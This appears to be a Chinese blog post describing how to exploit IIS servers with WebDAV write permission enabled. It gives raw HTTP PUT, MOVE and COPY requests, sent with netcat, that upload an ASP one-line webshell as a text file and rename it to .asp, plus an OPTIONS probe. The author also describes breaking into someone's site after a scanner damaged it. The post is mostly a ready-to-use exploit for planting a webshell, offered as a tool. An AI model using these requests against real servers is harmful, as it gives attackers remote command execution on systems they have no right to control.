很老的东西了,严格的说不是漏洞,只是设置不善造成的Bug。八百年遇不到一会,结果前几天不幸碰上了。
用JSKY扫描人家的站,结果扫描器居然直接把人家整站给删了= =#(这也是百年不遇吧....囧,我猜JSKY用的参数一定是“/”)。
还好,最后搞进去把人家的站恢复了,真惊险。还义务帮他补漏洞,删后门......
其中用到了IIS写权限利用工具,桂林老兵版的没带身上,网上下到了zwell版的,结果没成功,最后自己动手写了一个手动版的,看来还是“自己动手,丰衣足食”哇,呼呼。
分别保存下面两个TXT文件。
//PUT.TXT
PUT /zerosoul.txt HTTP/1.1
HOST:
Content-Length: 24
<%Execute request(’#’)%>
//MOVE.TXT
MOVE /zerosoul.txt HTTP/1.1
HOST:
Destination: http:///zerosoul.asp
(别忘了上面有两下回车)
然后在CMD分别输入以下命令即可:
c:\>nc 80
c:\>nc 80
然后就得到了地址为http:///zerosoul.asp的一句话。
通过上面文本的内容,我们可以轻易看出IIS写权限是怎么利用的:
1.使用PUT方式上传后缀名为TXT的一句话马(不能直接上传IIS能解析的文件)。
2.使用MOVE方式把后缀改成ASP(这里用COPY也是可以的哈)。
这个手动版的利用工具虽然不能有已经做好的EXE工具那么傻瓜,但我觉得使用它的时候我们能自己控制所有内容,而且能轻易的理解这个bug利用的原理,然后即使在下不到工具的场合,我们也可以自己轻易写一个出来,呵呵。
网上都说只要打开IIS的“写入”就能利用,但是我在2003虚拟机里面一直没测试成功,在XP的IIS5里面测试成功PUT,但MOVE不成功,文件夹权限我都设置的everyone完全控制了,所以应该还有其他地方的原因。
一些补充
//OPTIONS.TXT 可以查看服务器支持哪些Method
OPTIONS / HTTP/1.1
HOST:
//COPY.TXT MOVE不行可以用这个试试
COPY /zerosoul.txt HTTP/1.1
HOST:
Destination: http:///zerosoul.asp
阅读(3035) | 评论(0) | 转发(0) |